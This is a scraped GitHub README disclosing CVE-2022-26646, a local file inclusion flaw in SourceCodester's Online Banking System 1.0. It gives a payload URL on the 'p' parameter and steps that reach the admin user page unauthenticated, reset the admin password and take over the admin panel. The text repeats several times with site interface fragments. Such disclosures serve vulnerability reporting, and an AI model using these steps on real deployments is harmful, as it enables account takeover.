Tittle: Online Banking System LFI.

Author: (Erik451)

CVE: CVE-2022-26646

Vendor Homepage: https://www.sourcecodester.com/

Software Link: Online Banking System

Version: OBS 1.0

Description: The parameter "p" and "page" includes files. An unauthenticated user can read internal php files of the web. LFI to Privilege Escalation

Null session account to admin
Payload used: http://web.com/banking/?p=<any_phpfile>

Steps to reproduce:

1- Go to home page http://localhost/banking/?p=about

2- Load the admin user page http://localhost/banking/?p=admin/user/index

3- Change the admin password

4- Login as administrator

5- Admin panel

Other Payload:

Reading info.php

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Tittle: Online Banking System LFI.

Author: (Erik451)

CVE: CVE-2022-26646

Vendor Homepage: https://www.sourcecodester.com/

Software Link: Online Banking System

Version: OBS 1.0

Steps to reproduce:

Other Payload:

Files

README.md

Latest commit

History

README.md

File metadata and controls

Tittle: Online Banking System LFI.

Author: (Erik451)

CVE: CVE-2022-26646

Vendor Homepage: https://www.sourcecodester.com/

Software Link: Online Banking System

Version: OBS 1.0

Steps to reproduce:

Other Payload: